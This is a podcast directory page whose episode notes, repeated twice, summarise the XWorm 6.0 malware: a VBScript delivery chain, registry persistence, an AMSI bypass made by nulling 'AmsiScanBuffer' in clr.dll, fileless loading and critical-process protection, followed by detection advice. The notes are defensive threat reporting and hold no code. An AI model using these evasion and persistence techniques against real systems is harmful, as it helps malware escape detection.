To give you the best possible experience, this site uses cookies. Review our Privacy Policy and Terms of Service to learn more. Got it!
Search a title or topic

Over 20 million podcasts, powered by 

Player FM logo
Artwork

Tech Meni Tasa Podcasting Education News Tech News
Content provided by Meni Tasa. All podcast content including episodes, graphics, and podcast descriptions are uploaded and provided directly by Meni Tasa or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process outlined here https://podcastplayer.com/legal.
Player FM - Podcast App
Go offline with the Player FM app!
Get it on App Store Get it on Google Play

CyberBrief Project »
The Malware That Fights Back

6:25
 
Play
Playing
Share
 

MP3Episode home
Manage episode 502331683 series 3682380
Content provided by Meni Tasa. All podcast content including episodes, graphics, and podcast descriptions are uploaded and provided directly by Meni Tasa or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process outlined here https://podcastplayer.com/legal.

"Send me a quick text"

Episode Description

XWorm 6.0 adds a hostile twist to persistence. Delivered via obfuscated VBScript, it bypasses AMSI, runs entirely in memory, and marks itself as a “critical process” that crashes your PC if you try to kill it. In this episode, we walk through the attack from delivery to defense — and why it works so well.

Technical Write-Up

Initial Access: Delivered via obfuscated VBScript, likely through social engineering. Payload concealed as reversed numeric character codes, reconstructed at runtime.

Execution: Removes Zone.Identifier ADS, launches PowerShell to download a secondary script into the TEMP folder.

Persistence: Copies itself as update.vbs into TEMP and APPDATA, adds both to Windows Run registry key. Builder also supports scheduled tasks or startup folder persistence.

AMSI Bypass: Patches clr.dll in memory, replacing “AmsiScanBuffer” with null bytes to disable AMSI memory inspection.

Payload Delivery: Downloads XWorm binary from public GitHub repository via .NET HTTP client. Loads into memory with Assembly.Load for fileless execution.

Privilege Escalation & Process Protection: With admin rights, enables SeDebugPrivilege and marks itself as a “critical process,” causing a system crash if terminated.

Anti-Analysis: Terminates on Windows XP and if IP-API lookup detects hosting or data center IP ranges.

Defensive Recommendations:

  • Monitor for unusual VBScript execution, especially from email or downloads.
  • Detect PowerShell downloading scripts from public repositories.
  • Alert on in-memory modifications to clr.dll.
  • Investigate registry Run keys pointing to TEMP or APPDATA.
  • Watch for processes setting themselves as “critical.”
  • Track outbound requests to IP-API or similar services.

Indicators of Compromise (IOCs) & Scripts:
All the IOCs and scripts related to this malware are available in the Netskope Threat Labs GitHub repository:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Malware/XWorm/IOCs/2025-07-25

Support the show

Thanks for spending a few minutes on the CyberBrief Project.

If you want to dive deeper or catch up on past episodes, head over to cyberbriefproject.buzzsprout.com.

You can also find the podcast on YouTube at youtube.com/@CyberBriefProject I’d love to see you there.

And if you find these episodes valuable and want to support the project, you can do that here: buzzsprout.com/support

Your support means a lot.

See you in the next one, and thank you for listening.

  continue reading

14 episodes

#Tech #Meni Tasa #Podcasting Education #News #Tech News
Artwork

The Malware That Fights Back

CyberBrief Project

published

Play Playing
iconShare
 
MP3Episode home
Manage episode 502331683 series 3682380
Content provided by Meni Tasa. All podcast content including episodes, graphics, and podcast descriptions are uploaded and provided directly by Meni Tasa or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process outlined here https://podcastplayer.com/legal.

"Send me a quick text"

Episode Description

XWorm 6.0 adds a hostile twist to persistence. Delivered via obfuscated VBScript, it bypasses AMSI, runs entirely in memory, and marks itself as a “critical process” that crashes your PC if you try to kill it. In this episode, we walk through the attack from delivery to defense — and why it works so well.

Technical Write-Up

Initial Access: Delivered via obfuscated VBScript, likely through social engineering. Payload concealed as reversed numeric character codes, reconstructed at runtime.

Execution: Removes Zone.Identifier ADS, launches PowerShell to download a secondary script into the TEMP folder.

Persistence: Copies itself as update.vbs into TEMP and APPDATA, adds both to Windows Run registry key. Builder also supports scheduled tasks or startup folder persistence.

AMSI Bypass: Patches clr.dll in memory, replacing “AmsiScanBuffer” with null bytes to disable AMSI memory inspection.

Payload Delivery: Downloads XWorm binary from public GitHub repository via .NET HTTP client. Loads into memory with Assembly.Load for fileless execution.

Privilege Escalation & Process Protection: With admin rights, enables SeDebugPrivilege and marks itself as a “critical process,” causing a system crash if terminated.

Anti-Analysis: Terminates on Windows XP and if IP-API lookup detects hosting or data center IP ranges.

Defensive Recommendations:

  • Monitor for unusual VBScript execution, especially from email or downloads.
  • Detect PowerShell downloading scripts from public repositories.
  • Alert on in-memory modifications to clr.dll.
  • Investigate registry Run keys pointing to TEMP or APPDATA.
  • Watch for processes setting themselves as “critical.”
  • Track outbound requests to IP-API or similar services.

Indicators of Compromise (IOCs) & Scripts:
All the IOCs and scripts related to this malware are available in the Netskope Threat Labs GitHub repository:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Malware/XWorm/IOCs/2025-07-25

Support the show

Thanks for spending a few minutes on the CyberBrief Project.

If you want to dive deeper or catch up on past episodes, head over to cyberbriefproject.buzzsprout.com.

You can also find the podcast on YouTube at youtube.com/@CyberBriefProject I’d love to see you there.

And if you find these episodes valuable and want to support the project, you can do that here: buzzsprout.com/support

Your support means a lot.

See you in the next one, and thank you for listening.

  continue reading

14 episodes

#Tech #Meni Tasa #Podcasting Education #News #Tech News

All episodes

×
 
Loading …

Welcome to Player FM!

Player FM is scanning the web for high-quality podcasts for you to enjoy right now. It's the best podcast app and works on Android, iPhone, and the web. Signup to sync subscriptions across devices.

 

Listen to 500+ topics
Player FM - Podcast App
Go offline with the Player FM app!
Get it on App Store Get it on Google Play
icon
Help/FAQ | Advertise with Us
Arts|Business|Comedy|Economics|Entertainment|News|Politics|Religion
Science|Soccer|Sports|Storytelling|Technology|True Crime
Copyright 2025 | Privacy Policy | Terms of Service | | Copyright
Episode being played series thumbnail
icon icon
Speed
Series settings
1x
1x
Volume
100%
icon
icon icon
/

View Player FM in...
Player FM
Browser
Chrome
Safari
Firefox
Listen to this show while you explore
Play